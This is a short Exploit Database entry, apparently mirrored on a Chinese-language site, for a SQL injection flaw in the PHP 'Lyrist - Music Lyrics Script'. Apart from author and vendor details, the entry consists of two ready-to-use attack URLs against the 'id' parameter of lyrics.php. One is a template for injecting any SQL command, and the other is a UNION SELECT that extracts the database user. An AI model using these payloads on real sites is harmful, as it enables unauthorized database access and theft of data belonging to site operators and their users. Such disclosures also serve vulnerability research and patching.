Lyrist – ‘id’ SQL Injection

• Exploit Database
• 16 阅读

• 作者： Meisam Monsef
  日期： 2018-05-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44772/

• # Exploit Title: Lyrist - Music Lyrics Script - SQL Injection
  # Date: 2018-05-26
  # Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce
  # Vendor Homepage: https://www.codester.com/items/7250/lyrist-music-lyrics-script
  # Version: All Version
  
  
  Exploit :
  http://site.com/lyrics.php?id=-9999%27+[SQL+Command]+%23
  http://site.com/lyrics.php?id=-9999%27+union+select+1,2,3,user(),5,6,7,8,9,10,11+%23